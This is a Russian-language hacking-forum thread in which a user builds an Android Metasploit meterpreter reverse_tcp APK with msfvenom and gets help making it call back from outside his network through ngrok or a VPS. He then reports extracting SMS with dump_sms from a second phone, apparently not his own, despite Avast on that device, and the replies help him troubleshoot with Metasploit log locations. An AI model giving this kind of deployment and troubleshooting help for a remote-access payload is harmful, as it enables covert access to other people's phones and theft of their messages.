Metasploit framework

Egorka_salty

Member
27.06.2019
17
0
Сделал apk для android
Msfvenom -p android/meterpreter/reverse_tcp LHOST= МОЙ IP ....... итд

Если я ставлю свой локальный ip, который беру из ifconfig доступ у меня будет только если это устройство в моей сети? У меня на телефоне все работает, скидываю на второй, который не в моей сети, ничего не происходит, как быть?
 
Работает только в локальной сети, если же сделать динамический ip то будет работать не только в локальной сети
 
Работает только в локальной сети, если же сделать динамический ip то будет работать не только в локальной сети
Эмм, вообще-то наличие динамического или статического айпи на это не влияет.

Если я ставлю свой локальный ip, который беру из ifconfig доступ у меня будет только если это устройство в моей сети? У меня на телефоне все работает, скидываю на второй, который не в моей сети, ничего не происходит, как быть?
Дело в том что локальный ip и внешний абсолютно разные вещи, если ты на чужом компьютере оставишь файл, обращаюшийся к твоему локальному ip. А этот компьютер будет не в одной локальной сети с тобой, то сессия до тебя никогда не дойдёт

По умолчанию провайдеры(скорее всего и твой) за неимением достаточного количества IPV4 адресов, по умолчанию выдают
динамический адрес.
Если ты укажешь его в payload и доставишь до цели, а она его выполнит, то вот несколько нюансов:
1.тебе необходимо пробрасывать порты (очень рисковая затея, учитывая что сеть постоянно сканируют)
2.сессия может потеряться после первой перезагрузки роутера (но это в принципе не страшно)
Если ты сделаешь тоже самое с статическим ip, то все выше перечисленные ньюансы остаются(кроме второго)

Локальный айпи- айпи доступный только в твоей сети. Он присваивается роутером и люди в других сетях не могут с тобой через него взаимодействовать.
Внешний айпи - айпи доступный другим людям, в других сетях. Они могут с ним взаимодействовать, но напакостить имея только его на руках они не смогут(только если ты не пробросишь порты в интернет, или же эти люди - правительство)

В общем есть два способа это сделать:
1.ngrok (вот даже статья)

2.VPS и VDS(тут уже надо платить денюжку держателям vps и vds)
 
Последнее редактирование:
Эмм, вообще-то наличие динамического или статического айпи на это не влияет.


Дело в том что локальный ip и внешний абсолютно разные вещи, если ты на чужом компьютере оставишь файл, обращаюшийся к твоему локальному ip. А этот компьютер будет не в одной локальной сети с тобой, то сессия до тебя никогда не дойдёт

По умолчанию провайдеры(скорее всего и твой) за неимением достаточного количества IPV4 адресов, по умолчанию выдают
динамический адрес.
Если ты укажешь его в payload и доставишь до цели, а она его выполнит, то вот несколько нюансов:
1.тебе необходимо пробрасывать порты (очень рисковая затея, учитывая что сеть постоянно сканируют)
2.сессия может потеряться после первой перезагрузки роутера (но это в принципе не страшно)
Если ты сделаешь тоже самое с статическим ip, то все выше перечисленные ньюансы остаются(кроме второго)

Локальный айпи- айпи доступный только в твоей сети. Он присваивается роутером и люди в других сетях не могут с тобой через него взаимодействовать.
Внешний айпи - айпи доступный другим людям, в других сетях. Они могут с ним взаимодействовать, но напакостить имея только его на руках они не смогут(только если ты не пробросишь порты в интернет, или же эти люди - правительство)

В общем есть два способа это сделать:
1.ngrok (вот даже статья)

2.VPS и VDS(тут уже надо платить денюжку держателям vps и vds)
Супер, помогло, но любая команда будь то dump_sms или любая другая выдает ошибку error running comand
 
Супер, помогло, но любая команда будь то dump_sms или любая другая выдает ошибку error running comand
Скорее всего пользователь запретил разрешение на чтение SMS, ко всему тому антивирус андройд работает как сумасшедший и детектит все подряд.
Чтобы разобраться в чем конкретно ошибка чекни логи, по следуйщей ссылке перечислены все местонахождения логов в msf
 
Скорее всего пользователь запретил разрешение на чтение SMS, ко всему тому антивирус андройд работает как сумасшедший и детектит все подряд.
Чтобы разобраться в чем конкретно ошибка чекни логи, по следуйщей ссылке перечислены все местонахождения логов в msf
Специально на свой телефон поставил антивирус dr.web, он все пропускает. На втором телефоне стоит avast открыапет сразу много сессий один раз получилось вытащить смс, но до этого и после выдавал ошибку, отключал avast, не помогло. Другие команды тоде не работают, смс вытащились но было написано что сессия закрыта, я прописал команду dump_sms и все сработало
 
Специально на свой телефон поставил антивирус dr.web, он все пропускает. На втором телефоне стоит avast открыапет сразу много сессий один раз получилось вытащить смс, но до этого и после выдавал ошибку, отключал avast, не помогло. Другие команды тоде не работают, смс вытащились но было написано что сессия закрыта, я прописал команду dump_sms и все сработало

Странно, что Google play защита и встроенный антивирусник (на пример если у тебя xiaomi) ничего не заметили.

В любом случае - скинь логи metasploit , может быть там вообще банальная ошибка произошла. Если же в падлу кидать логи(палить ip и тд), то можешь посмотреть в логах код ошибки и вбить его в гугл => решить свою проблему.

А по данной ссылке ты можешь узнать где храняться логи:

Linux
  • /opt/metasploit/apps/pro/ui/log/{reports,exports,production,thin}.log
  • /opt/metasploit/apps/pro/engine/log/production.log
  • /opt/metasploit/apps/pro/engine/{prosvc,prosvc_stderr,prosvc_stdout}.log
  • /opt/metasploit/apps/pro/engine/config/logs/{db,framework}.log
  • /opt/metasploit/apps/pro/log/install


Windows

  • c:\metasploit\apps\pro\ui/log\{reports,exports,production,thin}.log
  • c:\metasploit\apps\pro\engine\log\production.log
  • c:\metasploit\apps\pro\engine\{prosvc,prosvc_stderr,prosvc_stdout}.log
  • c:\metasploit\apps\pro\engine\config\logs\{db,framework}.log
  • c:\metasploit\apps\pro\log\install
 
Мы в соцсетях:

Взломай свой первый сервер и прокачай скилл — Начни игру на HackerLab